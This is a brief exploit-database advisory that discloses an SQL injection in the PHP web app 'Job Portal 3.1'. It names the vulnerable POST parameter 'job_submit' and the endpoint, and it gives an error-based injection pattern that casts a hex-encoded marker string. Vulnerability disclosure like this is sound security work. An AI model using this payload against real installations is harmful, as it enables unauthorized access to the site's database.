Job Portal 3.1 - 'job_submit' SQL Injection

Author: Mehmet EMIROGLU
type: webapps
platform: php
port: 80.0
date_added: 2019-03-28  
date_updated: 2019-03-28  
verified: 0  
codes:   
tags: SQL Injection (SQLi)  
aliases:   
screenshot_url:   
application_url:   

raw file: 46622.txt  

===========================================================================================
# Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
# Version: v3.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Job portal is developed for creating an interactive
job vacancy for candidates.
  This web application is to be conceived in its current form as a dynamic
site-requiring constant
  updates both from the seekers as well as the companies.
===========================================================================================
# POC - SQLi
# Parameters : job_submit
# Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
# POST Method : http://localhost/newjobportal/job_search/search
===========================================================================================